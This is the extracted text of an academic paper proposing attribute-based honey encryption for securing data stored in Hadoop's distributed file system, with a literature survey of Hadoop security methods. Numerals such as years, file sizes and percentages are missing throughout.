promising platform to reliably process and store big data. it provides flexible and low cost services to huge data through hadoop distributed file system (hdfs) storage. unfortunately, absence of any inherent security mechanism in hadoop increases the possibility of malicious attacks on the data processed or stored through hadoop. in this scenario, securing the data stored in hdfs becomes a challenging task. hence, researchers and practitioners have intensified their efforts in working on mechanisms that would protect user’s information collated in hdfs. this has led to the development of numerous encryption-decryption algorithms but their performance decreases as the file size increases. in the present study, the authors have enlisted a methodology to solve the issue of data security in hadoop storage. the authors have integrated attribute based encryption with the honey encryption on hadoop, i.e., attribute based honey encryption (abhe). this approach works on files that are encoded inside the hdfs and decoded inside the mapper. in addition, the authors have evaluated the proposed abhe algorithm by performing encryption- decryption on different sizes of files and have compared the same with existing ones including aes and aes with otp algorithms. the abhe algorithm shows considerable improvement in performance during the encryption-decryption of files. subjects cryptography, security and privacy keywords big data, data security, and encryption-decryption, hdfs, hadoop, cloud storage introduction data security has now become one of the top most concerns for any individual or organization. day by day, substantial amount of information is transferred through digital applications which require heaps of extra storage space, processing assets and dynamic framework execution. the exponential use of smart phones, social networking sites, downloaded apps, web sensor are generating huge amount of data. this has led to several issues in big data including storage customization, security, cost-effectiveness, smooth performance, vendor lock-in, and compliance. all these issues have their importance in hadoop. however, big data security and privacy has become the burning issue for hadoop hdfs data storage and distributed computing. this study essentially focuses on ensuring security and privacy for big data at the storage level. how to cite this article kapil g, agrawal a, attaallah a, algarni a, kumar r, khan ra. . attribute based honey encryption algo- rithm for securing big data: hadoop distributed file system perspective. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:gayatri @gmail.com mailto:rs @gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. when utilizing the hadoop hdfs data storage service, clients have no compelling reason to store information locally and thus convey it constantly. as is the usual norm, the information is kept on the hadoop hdfs storage server to ensure that clients can access a given information as per their convenience, irrespective of the time and place they choose to avail it from. the hadoop hdfs storage server provides both hardware allocation and information security assurance. as long as the clients are connected with the internet, they get their information easily. hadoop is an on-going innovation which is utilized as a system for the huge information storage. it is an open source execution of the structure dependent on java. hadoop is utilized in a substantial bunch or as an open cloud administration. this process is termed as the standard conveyance parallel processing framework (polato et al., ). the versatility of hadoop is evident by its ubiquitious use, yet hadoop is devoid of effective mechanisms to ward off security breaches of the data stored in hdfs as hadoop provides no inherent security for the information stored in it, numerous methods and approaches for securing the stored hdfs files have been explored by various researchers and practitioners. among all these efforts, encryption seems to be the most promising answer for securing information in hdfs that is kept in datanodes as well as for securely exchanging datafrom one datanode to another datanode while executing mapreduce jobs. encryption techniques can considerably reduce the security breaches and data infringement in hadoop environment. however, the results obtained through various encryption algorithms have demonstrated that the document sizes of the original files can be extended to about one and a half. further, the uploading as well as the downloading time of a given file can also be increased. hence, to adress these concerns, the researchers of this study have propositioned a new encryption-decryption algorithm, i.e., the abhe. as per the simulation results, this technique has shown marked improvements over encryption-decryption time in comparison with the already available algorithms including the advanced encryption standard (aes) and aes with otp (mahmoud, hegazy & khafagy, ). the main contributions of paper are: • to carry out the in-depth study of big data processor, i.e., hadoop and to assess its strength and weakness in terms of security and privacy; • to propose an abhe, a secure and efficient algorithm executed on single and two datanodes in hadoop. also, it ensures the full security against all side channel attacks, brute force attack and collusion attack; • to conduct experiments on test data to prove the efficacy of our proposed approach abhe vs. other secure approches i.e., aes and aes-otp; • the performance of proposed abhe has been calculated in terms of file size, encryption time, decryption time, throughput and power consumption; • the result shows that abhe improves the execution time (total time taken for encryption and decryption of data) without affecting the size of original file. the rest of the paper has been divided into the following sections: • section - enlists the pertinent research done in the domain of big data storage; kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • section - enunciates the suggested data encryption algorithm formulated on abhe; • section - presents the integration of the suggested algorithm with hadoop environment. furthermore, this section also provides a comparison between the efficacy of the suggested encryption approach vis-a-vis the two already available encryption algorithms namely; aes and aes with otp with different sizes of text files ranging from mbs to gbs ( mb, mb, mb, and gb); • section - underlines the significance of this research study; • section - concludes the study. related work hadoop security hadoop was created in with the intention to manage only huge amount of data confined to a specific condition. thus, security issues weren’t the topmost preference (yalla et al., ). for any data storage, hadoop employs the user’s name. in the default node, there is no encryption among hadoop, the client host as well as the hdfs. all the records are feeded into and constrained by a central server which is known as namenode. thus, hdfs lacks in security system against capacity servers. hence, all information stored in this process is prone to be breached. besides, a strong security model is also lacking between hadoop and hdfs. the correspondence among datanodes and among the end users and datanodes remains encoded. it has no validation of clients or administration. even after yahoo concentrated on including authentications in , hadoop still had constrained approved abilities (yalla et al., ). in , the apache software foundation defined venture rhino to include security highlights (yalla et al., ). hadoop has the facility of data management that is scalable, rich in features and cost-effective for the masses. it has been a data platform of storing secret information for many organizations. the data stored in slots is saved but once it is brought together and made accessible for organizations over the masses, new security challenges arise. big data in a hadoop contains sensitive information related to financial data, corporate information, personal information and many such confidential data of clients, customers and employees. hence, optimum protection of such data and ensuring that it remains free from any encroachment or tampering is of utmost significance (rerzi, terzi & sagiroglu, ; mehmood, natgunanathan & xiang, ; bardi et al., ; scrinivasan & revthy, ; derbeko et al., ; gupta, patwa & sandhu, ). big data: hadoop security solutions to elucidate the mentioned problems, a few activities have been appended to hadoop to keep up with the equivalent (vormetric data security, ; jam, akbari & khanli, ): perimeter security: network security firewalls, apache knox gateway authentication: kerberos authorization: e.g. hdfs permissions, hdfs acl s, mr acls data protection: encryption at rest and encryption in motion. to provide security for data in hdfs, few available mechanisms are: kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. authentication authentication implies user’s identification. authenticators are answerable for gathering testimonials by the api (application programming interface) consumers, authenticating them and publicizing the success or failure status to the clients or chain providers. because of this primary check, uncertain users won’t be able to access the cluster network and trusted network. identification is regulated by the client host. for strong authentication, hadoop uses kerberos (vormetric data security, ; jam, akbari & khanli, ), and ldap (lightweight directory access), ad (active directory) integrated with kerberos, establishing a single point of truth. kerberos is a computer grid authentication protocol which generates ‘‘tickets’’ to allow the nodes communicating over an unprotected network to prove their identity to one another. the reliable server authentication key is placed in each node of the array to achieve authenticity of the hadoop cluster node communication which will develop the hdfs array. it can effectively prevent non-trusted machines posing as internal nodes registered to the namenode and then process data on hdfs. these components are used throughout the cluster. hence, from the storage point of view, the legitimacy of the nodes in hdfs cluster could be guaranteed by kerberos. it is completely entrusted by hadoop for authentication between the client and server. hadoop . . version includes the kerberos mechanism. client requests an encrypted token of the authentication agent. a particular service can be requested from the server by using this. password guessing attacks remains inoperative in kerberos and thus multipart authentication is not provided (zettaset, ). authorization authorization or restrict access is the method of securing the access within the data by the users as per the corporate policies or service provider. authorization provider may also use an acl (access control list) based authorization access called the knox gateway (vormetric data security, ; jam, akbari & khanli, ) which is based on the evaluation of rules that comprises username, groups and ip (internet protocol) addresses. the aim of hadoop’s developer is to design an authorization plan for the hadoop platform to manage the authorization structure for hadoop components. data protection data protection is a process to protect the data at rest or store and during transmission with the help of encryption and masking (vormetric data security, ; jam, akbari & khanli, ). encryption is a technique which acts as an added layer in security in which data is encrypted (unreadable) during transmission or at rest. hadoop employs the existing capabilities of data protection by providing the solution for data at rest and data discovery and masking. however, hadoop’s security still needs some improvement. the work that has already been done by the researchers and practitioners on hadoop is highly commendable. several research studies have focussed on techniques to improvie the security of the data at rest as well as during transmission. some of the relevant approaches have been discussed below: kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. achieving secure, scalable and fine-grained data access control. the work combines techniques of attribute-based encryption (abe), proxy re-encryption, and lazy re- encryption (yu et al., b). this integrated method accomplishes fine grainedness, scalability, and data confidentiality during data access control in cloud computing. in this work, data files are encrypted using symmetric deks (symmetric data encryption key of a data files) and later, encrypted deks with kp-abe (public key cryptography primitive for one-to-many communications). such a dual encryption technique is called hybrid encryption. the kp-abe technique is used for basic fuctions like the creation or deletion of files and user allocation with fine-grained data access control mechanism. user allocation is a big issue in this process and to achieve this, the author has combined proxy re-encryption with kp-abe and distributed some tedious computational tasks to cloud servers. the cloud server stores secret key components and one dummy attribute corresponding to each user. when data owner does some modifications in the set of attributes while user allocation, the proxy re-encryption keys are generated and transferred to cloud servers. later, cloud servers update their secret key on the basis of new re-encryption keys and re-encrypt the data files accordingly. due to this, data owner is free from computation load during user allocation and do not need to stay online, since the cloud servers have already taken over this task after having the pre keys. moreover, the burden of secret key updating and re-encryption of data file tasks are merged as single task using lazy re-encryption technique to save computation overhead of cloud servers during user revocation. secure data sharing by using certificate-less proxy re-encryption scheme. this study stated that by using a public cloud, data can be shared securely. the research work presented a concept wherein a certificate-less proxy re-encryption scheme (cl-pre) is introduced (xu, wu & zhang, ). according to this concept, an identity based public key is added to the proxy re-encryption technique. this removes the traditional identity problem of key escrow. this scheme requires no certificates for the authenticity of the public key. this scheme (cl-pre) is used to decrease the figuring and correspondence cost for information proprietor. fully homomorphic encryption. this research (jam, akbari & khanli, ) proposed a design of trusted file system by combining the authentication agent technology with the cryptography fully homomorphic encryption technology.this is used for hadoop which provides reliability and security from data, hardware, users and operations. this enables the user to prevent data breach along with enhanced efficiency of the application which is possible due to the encrypted data in the homomorphic encryption technology. authentic agent technology also provides a range of techniques which are an integration of different mechanisms such as privilege separation and security audit that provides security of data in hadoop system. fully homomorphic encryption technique gives the ability to various users to carry out any operation on encrypted data with same results, provided the nature of the data remains kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. same, i.e., encrypted form throughout the operation. the data remains in encrypted form when processed with map reduce technique and stored safely in hdfs. a novel data encryption in hdfs. a new method for encrypting a file while uploading in hdfs has been proposed in this research work (nguyen et al., ). the upload process is done along with the encryption process before uploading data on hdfs. in this method (nguyen et al., ), the user selects a file to upload and provides a unique secret key for encryption of selected file. in this approach, user can feel the same experience when uploading a normal (without encryption) file to hdfs since the encryption is done in a fair manner. also, this method utilises the characteristics of read/write operation to reduce the total time in hdfs. as an experiment, the author applied this technique on mb file and observed that the encrypting upload and decrypting download process is usually . to . times faster than the conventional method. the major drawback of this approach is the key management because the keys are increased with respect to the users and to deal with them is quite challenging. additionally, encrypting file sharing issue is also not possible with this approach. this proposed approach is lagging due to these two major issues and needs the dedicated attention of researchers and practitioners. secure hadoop with encrypted hdfs using aes encryption/decryption. security in hadoop architecture is proposed in this paper by applying encryption and decryption techniques in hdfs (park & lee, ). in hadoop, it is achieved by adding aes encrypt/decrypt function to compression codec. experiments on hadoop proved that the computation overhead is reduced by less than % when representative mapreduce job is done on encrypted hdfs. triple encryption scheme for hadoop-based data. cloud computing has the distinctive ability to provide users with customised, adaptable and trustworthy services at feasible costs. hence, more and more users are availing of cloud computing. given the rising demand of cloud appications, the protection of the cloud storage of data has become imperative. a method called novel triple encryption has been introduced in this paper (yang, lin & liu, ) to achieve data protection at cloud storage. the triple encryption approach uses dea (data encryption algorithm) for hdfs files encryption, rsa for the data key encryption and finally idea for encrypting the user’s rsa private key. in this approach, des and rsa based hybrid encryption technique is used to encrypt hdfs files and idea (international data encryption algorithm) to encrypt the rsa based user key. in hybrid encryption, des algorithm is used to encrypt the files and get the data key. this data key is again encrypted by using rsa algorithm to provide additional security. the data key can be decrypted by using private key only, therefore, it is always with the user. this method uses both symmetrical and asymmetrical encryption techniques, so called as hybrid encryption. this approach is tested and implemented in hadoop based cloud data storage. attribute-group based data security access. due to various security issues, development and use of cloud storage has been decreased. to gain the confidence of user, author has defined an attribute group based data security access scheme to protect the data during kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. network and data sharing features in cloud storage services. in this scheme (zhou & wen, ), the data owner has limited user rights and re-encryption on the data node reduces the computational cost along with the management of the clients. it also reduces the complexity of property and rights management. also, the author uses cipher text cp-abe encryption algorithm to secure the data at cloud storage. the centralised management of key distribution and name node based cp-abe algorithms have advantages like more transparency for the user and easy managemnt of the user key as compared to the data owner key distribution technique. towards a trusted hdfs storage platform. the mechanism for the protection of a hadoop infrastructure has been explained in this research (cohen & acharya, ) to deal with the concept of creating a reliable hdfs and safety hazards. also, the researchers of this paper figure out the relation between security mechanisms and their effect on its performance (cohen & acharya, ). in the discussion, the authors implemented trusted computing concepts on a hadoop considering a threat based environment. this framework is based on the trusted platform module (tpg) and implemented into a base environment. furthermore, the authors have utilized hardware key protections encryption scheme for hadoop and aes-ni for accelerating the encryption and compared results after their implementation. in addition, the authors have claimed that there is % of the overhead reduction on encryption and % overhead reduction while decryption during experiment on simulated mb block data with the aes-ni instructions. this approach provides a concrete layered security design in hadoop. security framework in g-hadoop. an approach has been introduced where hadoop’s mapreduce task runs simultaneously on multiple clusters in a grid environment called g- hadoop (jam, akbari & khanli, ; zhao et al., ). g-hadoop reuses user authentication and job submission mechanism of hadoop in a grid environment. but initially, hadoop’s user authentication and job submission mechanism have been designed for a single cluster in a non-grid environment. therefore, g-hadoop is an extended version of hadoop mapreduce task. it established a secure link for user and target cluster by following the secure shell protocol. a single dedicated connection is allotted to each participating user in a cluster and each user has to log on to only those clusters for which they are authenticated. unlike hadoop, they have to design a new security framework for g-hadoop with various security solutions like public key cryptography and globus security infrastructure. concepts of proxy identity, user interface, and user instance, are embedded in this security framework to give better functions in a grid environment (jam, akbari & khanli, ; zhao et al., ). this security framework introduced a single-sign on approach during user authentication and job submission process of the g-hadoop. also, this security approach protects the g-hadoop system during threat environment, i.e., traditional attacks, abusing and misusing. the model of security framework is based on globus security infrastructure (gsi). the utilization of ssl protocol for communication between the master node and the ca (certification authority) is also the key factor in security. kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. gsi is based on single sign on process and uses asymmetric cryptography to provide a secure communication. gsi is a standard grid security which adapts to various techniques to provide necessary requirements in a grid environment.this includes authentication, integrity of the messages and delegation of the authority from one entity to another in a grid environment. the user can only log-in into the master node after providing his authentication in the form of user name and password and submit jobs to the cluster. ssl handshaking is used in the security framework to establish a secure connection between datanode and a namenode. elliptic curve cryptography based security scheme for hadoop distributed file system. this paper (jeong & kim, ) introduces a token based authentication scheme to protect hdfs stored data from security threats like breach and impersonation attacks. in this scheme, hdfs client authentication is done by the data node through block access token and functions as an extra layer of security along with the existing security, i.e., symmetric key hdfs authentication. also, ecc encryption method is used for for authentication of anonymous keys and provides protection against external threats like security breaches or accidental exposures. this scheme adopts the hash chain of keys approach instead of a public key exchange approach which is a very common hdfs authentication protocol. apart from providing protection to the sensitive hdfs data, it also improves the performance as compared to the public key-based hdfs authentication protocols. secure multi sharing in big data storage. a method of privacy preserving security by using different mechanisms, i.e., anonymity, multiple receiver and conditional sharing is explained in this paper (maheswari, revathy & tamilarasi, ). in this approach, to get the maximum security, advanced encryption standard (aes) with message digest (md ) & data encryption standard (des) have been employed to encrypt the data and authentication of data has been done using the dsa. also, security and privacy preserving approaches have been used for the big data processing in the proposed framework. in this approach, owner uploads the data in cloud storage and after encryption, data is stored in hdfs. thereafter, the data is shared among the multiple receivers. cipher text is used to hide the identity of the sender and receiver whereas anonymization mechanism is used to hide information of a particular receiver. a mechanism based on user and their received data category called conditional sharing starts working after receiving the receiver’s details. and, if the user’s category is matched with receiver’s data category, then the receiver gets authenticated and the transmission is started. once the conditional sharing is complete, receiver retrieves the cipher text. the big data is shared with the cloud only if the result is secured. this proposed algorithm is verified for small data sets only. towards best data security. in this paper, the author has described about the enormous information and its safety issues (tian, ). also, he has described about the existing ways to improve the security of enormous information like security hardening methodology with attributes relation graph, attribute selection methodology, content based access control model and a scalable multidimensional anonymization approach. the author of this paper (tian, ) has proposed an intelligent security approach based on real time kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data collection and threat analytics to detect the threat before the security breach takes place. hdfs data encryption based on aria algorithm. in this paper (song et al., ), the author has presented an encryption scheme based on south korea’s aria encryption scheme to protect the hdfs data in hadoop. the aria algorithm uses -bit block for data encryption. in this approach, variable length data (not necessarily the -bit data) is divided into hdfs blocks. the proposed aria based algorithm provides the same level of data security at cost of only % performance degradation (during query processing) compared to aes algorithm. in addition, the researchers explained the future of aria based encryption scheme in genuine word applications like area based administrations and financial related data handling. chaos-based simultaneous compression and encryption for hadoop. this paper (usama & zakari, ) introduced a framework based on a masking pseudorandom key stream to increase the encryption quality and provide robust encryption security & compression during read and write operation when integrated in hdfs. also, the researchers have proposed a scheme for hadoop using simultaneous compression and encryption to solve the implementation issues. the enhancement consequently improves the speed and efficiency of the algorithm. the proposed algorithm is highly compatible with hadoop and provides efficient encryption security and compression during storage of data. various experimental results concluded that the performance of the cluster in hadoop gets reduced when compression and encryption operations are done separately because they need a significant volume of data for both the operations. this proposed algorithm can compress and encrypt the data simultaneously during mapreduce which reduces the required data space with minimum network resources. the proposed algorithm has passed edits security analysis test with a % confidence interval. further, all nist sp - assays are successfully passed on cipher text generated from the plaintext. data encryption based on aes and otp. this research paper (mahmoud, hegazy & khafagy, ) has highlighted a method to improve the upload and download time with reduction of encrypted file size by aes and otp algorithms in hdfs. the authors performed encryption and decryption by two different ways which are based on aes and aes-otp algorithms. the researchers chose cipher block chaining with the ecb mode of aes algorithm for handling hdfs blocks and otp algorithm is used as a stream cipher. this keeps length of the plaintext same. for decryption, a private key is required which is always in the custody of user. in this method, when client has mentioned to transfer a record to hdfs, the application server creates an arbitrary key which is then separated into keys for doing multi encoding and unscrambling by utilizing aes-otp algorithm.moreover, the authors have compared the file encryption time among generic hdfs, encrypted hdfs by aes and hdfs encrypted file by aes with otp. the results show that the aes with otp algorithm increased the encrypted file size by % of the original file. the researchers also executed parallel decryption processing in map task to improve performance. kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. two-layer selective encryption using key derivation method. in this paper (vimercati et al., ), the authors have explained the use of two-layer selective encryption technique based on key derivation method to implement the authorization policy (atallah, frikken & blanton, ). in this method, the user assigns a secret key corresponding to each file which is encrypted using a symmetric key. the owner creates public tokens by using his secret key to allow any user further. later, these public tokens along with token distribution task are transferred to the semi-trusted server. to derive the decryption key for a file, a minimal number of secret key per user and a minimal number of encryption key are required since the server cannot derive decryption key of any file with the available public tokens. the file creation and user grant/revocation operation gets complex as the number of users increases. this makes the suggested method unscalable (yu et al., a). also, the user access privilege accountability is not supported in this method. security and privacy aspects in mapreduce on clouds. hadoop uses the filters in vigiles (ulu- soy et al., ) for a fine grained access control framework. these filters are coded in java by security administrators and handled authorization by means of per-user assignment lists. on the other hand, in guardmr, filters are allocated with limited roles on the basis of subject and a formal specification approach for the definition of filters is proposed. guardmr and vigiles rely on platform specific features for regulating the execution of a mapreduce task such as the hadoop apis and the hadoop control flow and do not need the hadoop source code customization. vigiles and guardmr have observed apractically low implementation overhead which means that they do not provide any support for context aware access control policies (colombo & ferrari, ). in (derbeko et al., ) authors considered security and privacy challenges and urgent requirements in the scope of mapreduce and reviewed the existing security and privacy protocols for mapreduce including accountablemr and trustmr. the study also provides a comparison of several security algorithms, protocols and frameworks for mapreduce framework. hybrid storage architecture and efficient mapreduce processing for unstructured data. in this paper (lu et al., ), a technique called hybrid storage architecture is proposed. with this technique, different kinds of data stores are integrated to the model and it also enables the strorage and process of the unstructured data.to execute mapreduce-based batch-processing jobs, various partitioning techniques are applied which are based on the said technique. the paper also demonstrates the utilization of the characteristics of different data stores for building a smart and an efficient system. the partitioning techniques leverages the unified storage system thus reducing the i/o cost and improves the large-scale data processing efficiency marginally. towards privacy for mapreduce on hybrid clouds using information dispersal algorithm. in cheikh, abbes & fedak ( ), to ensure privacy for mr in a hybrid computing environment based on the grid’ platform, an algorithm known as information dispersal algorithm is required which comprises both untrusted infrastructures (such as, desktop grids and public clouds) and trusted infrastructures (such as, private clouds). kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. semrod: secure and efficient mapreduce over hybrid clouds. semrod (oktay et al., ) firstly segregate the data into sensitive and non-sensitive data groups and then send the non-sensitive data to public clouds. private and public clouds execute the map phase. however, the private cloud pulls all the outputs includng outputs of the map phase containing sensitive keys. also, it executes the reduce phase operation only on record associated with sensitive keys andignores the non-sensitive keys. on the other hand, a public cloud execute the reduce phase on all outputs without knowing the sensitive keys. finally, a sensitive key is generated by removing the duplicate entries with the help of filtering step. mtmr: ensuring mapreduce computation integrity with merkle tree-based verification. proposed mtmr (wang et al., ) is a method based on merkle tree based verification to ensure the high integrity of the mapreduce tasks. it performs two rounds of merkle tree based verification for the pre-reduction and restoration phases and covers mapreduce in a hybrid cloud environment. in each round, mtmr samples a small portion of reduces task input/output records on the private cloud and then applies the merkle tree-based verification. the authors believe that mtmr can significantly improve the results while producing moderate performance overhead. security threats to hadoop: data leakage attacks and investigation. this article (fu et al., ) presents an automatic analysis method to find any data leakage attacks in hadoop. it also presents a forensic framework including an on-demand data collection method in which it collects data from the machines in the hadoop cluster on the forensic server and then analyzes the same. it can detect suspicious data leakage behaviors and give warnings and evidence to users using its automatic detection algorithm. and, collected evidences can help to find out the attackers and reconstruct the attack scenarios. the authors of the paper have also talked about the security concerns of hdfs (or hadoop) and presented some possible data leakage attacks in it. vc and m r in mapreduce computation. vc (schuster et al., ) uses sgx to achieve confidentiality and integrity as part of the mapreduce programming model and requires a trusted hardware to perform computation. vc is not allowed to perform system calls but works and follows the executor interface of hadoop. on the other hand, m r (dinh et al., ) offer mechanisms for dropping network traffic analysis leakage for mapreduce jobs. preserving secret shared computations using mapreduce. the main reason of cloud insecurity is the loss of control over the data which can cause serious harm to the confidentiality of customer using cloud-computing. this problem can be overcome by providing secure computing environment and data storage (sudhakar, farquad & narshimha, ). also, techniques like encrypted representation and secret sharing techniques have emerged that offer verified security along with relatively efficient processing but are limited to only computing selection queries (dolev et al., ). kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. privacy preservation techniques in big data analytics. in this paper (mohan rao, krishna & kumar, ), authors have described about the various privacy threats and preservation techniques and models along with their limitations. the authors also proposed a data lake based method for privacy preservation of unstructured data. data lake is a repository to store raw format of the data either structured or unstructured, coming from different sources. apache flume is used for data ingestion from different sources and for their processing; data is transformed to hive tables. also, hadoop mapreduce using machine learning or vertically distributed can be applied to classify sensitive attributes of data whereas tokenization is used to map the vertically distributed data. major findings from the literature after a cautious and focused study of various methodologies/approaches on big data and hadoop security, the following observations have been made: • hadoop stores the data on multiple nodes in a distributed manner while metadata and edit logs are stored on name nodes. the communication of data happens between client node and data node. hence, multiple nodes are used in the hadoop framework. the data is vulnerable to the hacks during the transmission, as it is not encrypted by default. various communication protocols are used for internode communication. the available approaches or solutions for securing the data transmission include kerberos, simple authentication and security layer (sasl), etc. however, these traditional approaches are not effective and sufficient enough to secure big data. • data that is stored in fixed storage is known as data at rest or at storage level. initially the stored data is prone to security attacks being not encrypted. since, hadoop works on the principal of spreading data across multiple nodes, consequently it is exposed to all insecure entry points. there are numerous methods available for data encryption in hadoop. as hadoop deals with large volume of data, it takes time in the encryption/decryption process. in order to maintain the performance, it is important to use an encryption technique that is fast enough to encrypt/decrypt. according to the studies, the encrypted data increases in the size almost by one and half time of the original data so the file upload time also gets affected. • cloud providers need to design a cost-effective infrastructure that understands customers’ needs at all levels. to meet the requirements, it is needed to share the storage devices amongst the multiple users, which is known as multi-tendency. but sharing of resources results in security vulnerability. if proper security measures are not implemented, then the attacker is able to get easy access to the customer’s data, more so in the case of using the same physical device. • companies would never know if the data is being used by someone else or not, because they don’t have direct control over their data. the lack of resource monitoring mechanisms creates many security issues. • customers have to rely upon trust mechanism as an alternate security measure in which they have to control data and their resources. cloud providers also provide certificates of operations of a secure provider to the customers. the certificates are well authenticated with established standards. kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • the security capabilities which are for ‘‘non big data’’ are needed for big data also to ensure client verification, management of data masking and encryption. materials & methods data encryption based on attribute based honey encryption (abhe) in hadoop, the inherent security feature is simple file permission and access control mechanisms. in such context, encryption is the best technology applied for securing hdfs files that are stored in datanodes. further, while processing mapreduce transferring files among datanodes, encryption is the best solution. we can use cryptography for data protection in hadoop, solution to data confidentiality and data integrity can be achieved using encryption technique. cryptography keys can be categorised into: secret key cryptography and public key cryptography. public key is known as asymmetric key cryptography (dyer et al., ) while secret key is symmetric secret key cryptography which is used in stream ciphers for generation of password based encryption (vinayak & nahala, ). encryption is mainly used to ensure secrecy. encryption actually means secret writing which was initially used by ancient humans desiring to store secrets. in the past, encryption was available only to generals and emperors, but today it is used by nearly everyone, every day, every time whenever a credit card transaction, data storage and node to node communication is done, phone call is made, secure website is used; encryption techniques are used. efficacy of an encryption algorithm depends on the key length (ebrahim, khan & khalid, ). however, the available encryption algorithms are considered to be secure. but depending on the time and computing power, they are also susceptible to intrusions (yin, lska & zhou, ). the present encryption techniques are also beset with vulnerabilities, for instance, when decrypting with a wrongly guessed key, they yield an invalid looking plaintext message, while decrypting with the right key, they give a valid-looking plaintext message, confirming that the cipher-text message is correctly decrypted (yin, lska & zhou, ). in the same row, the honey encryption has been proposed by jules and ristenpart (juels & ristenpart, ). it is a concept which addresses vulnerability discussed in the previous paragraph and makes the password based encryption (pbe) more difficult to be broken by brute-force. traditional encryption methods would show random text with no meaning at all when decrypting is done with wrong key and hence confirming its invalidity. on the contrary, honey encryption shows plausible looking text even when the key is wrong so the attacker won’t know if the guessed key is the right one. this unique approach slows down the attacker by fooling him and increases the complexity of password guessing as well as cracking process. there are few other technologies that share same term ‘‘honey’’. for example, honeywords (juels & ristenpart, ) are a password that are used as decoy and generates an alert and notifies the administrator if used. honeypots (owezarski, ), honeynet (kim & kim, ), and honeyfarm (jain & sardana, ) are some other examples of luring systems. honey encryption is related to format-preserving-encryption (fpe) (bellare et al., ) and format-transforming-encryption (fte) (dyer et al., ). kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in the fpe, both the plaintext and cipher-text message are same whereas it is not the case in fte. in honey encryption, the messages are stored to a seed range in the seed space. seed space and message space are different, so the cipher-text message space is different from the message space. vinayak & nahala ( ) used the he scheme in manets to secure ad-hoc networks against brute force attacks. tyagi et al. ( ) applied he technique to protect simplified text messages and credit card number that are susceptible to brute force attacks. choi, nam & hur ( ) proposed schemes to solve human typo problems with message recovery security. legitimate user may get confused seeing the different result than expected if there was some mistake in typing the password correctly. edwin mok et al. (tan & samsudin, ) came up with an extended honey encryption (xhe) by adding additional security measures on the encrypted data. however, honey encryption is still difficult to be applied in certain applications. for example, if the attacker has some clue about the data which is encrypted, suppose he has a part of the original data, he can easily tell which result is bogus and which is the correct data by matching the data with the decrypted result. however, it is possible to brute force honey encryption if the attacker has crib that must match with it to confirm its legitimacy (wikipedia, ). it is still vulnerable and susceptible and further researches are going on. to overcome its limitations it must be expanded further by bringing out new security methods. this persuades the authors of this paper to develop an in-depth understanding of data security and privacy to solve issues related to honey encryption. this paper aims to focus on fixing the vulnerabilities in honey encryption and making it more secure. the authors have designed and implemented the attributed based honey encryption as an extension of the public key encryption. this would enable the users to encrypt and decrypt messages based on users’ attributes. only if the user matches the predefined attributes will the user be able to decrypt the message. it will help to keep the attacker away by blacklisting them. proposed encryption algorithm the proposed encryption algorithm is a more secure version of honey encryption. the encryption algorithm provides two tier securities so that it can overcome the limitations prevailing in existing encryption techniques. the proposed algorithm is termed as attribute- based honey encryption (abhe). its / bits encryption algorithm will perform two layers of encryption in order to enhance security and effectiveness. the use of cipher text policy- attribute based encryption (cp-abe) (zhao, wei & zhang, ; varsha & suryateja, ; shobha & nickolas, ) has been proposed in the algorithm. in the algorithm user’s private-key is superimposed with an access policy over a set of attributes within the system. a user can decrypt a cipher text only if his attributes satisfy the set of rules of the respective cipher-text. firstly, a set of attributes are chosen from the file to be encrypted; then a set of rules/policies are created for these attributes. on the basis of these rules, the given file is encrypted. further, for more security the encrypted file is again protected by password. as this password is based on honey encryption, it creates a set of honey words. the encrypted file is passed on and may be received by different users. now according to the kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. proposed algorithm, only the user having the desired set of attributes or the password would be able to decrypt the data. if someone wants to decrypt the encrypted file, he/she will have to enter the correct password. if password does not match, the user will be treated as intruder and previously set honey words will be displayed to him. if the password matches, the genuine user has to enter the private key which has been already created while encrypting the file. again, if private key does not match, the user will not be allowed to access the file. on matching, the user will be able to successfully decrypt the file. the overall process will provide better security for files. abhe algorithm for data security input: plain text file output: encrypted file step : generate private key step .a: set of attributes is specified that describe the key. step .b: output private key ‘q’ step : encryption:(the algorithm encrypts file ‘f’ with policy ‘p’ and outputs the cipher-text) step .a: selects the file to be encrypted and set of attributes. step .b: encrypt a file f using a set of attributes occurring in the policy ‘p’ step .c: generate cipher-text ct step : encrypted file (in step- ) is protected again by the password step : generate honey words and present it to user. step : decryption: (decryption algorithm gets as input an encrypted file which is protected by the password. cipher-text ct is produced by the encrypted algorithm, an access policy ‘p’ under which ct was encrypted.) step .a: input is encrypted file step .b: enter the password; if password matches, the cipher text ct is decrypted, otherwise intruder is detected. step .c: user applies y number of attributes to compute private key step .d: if key matches, file is decrypted and output the corresponding original file ‘f’, otherwise it outputs null. authors have introduced a method to enhance the security level in which the data encryption and key management server are put together and provided a unique key for each application or cluster with hdfs encryption. when hdfs encrypted file entering into the apache hadoop environment, it remains in encrypted form at storage after processing. the results including intermediate results are always stored in encrypted form within the cluster in a file system having non hdfs form. 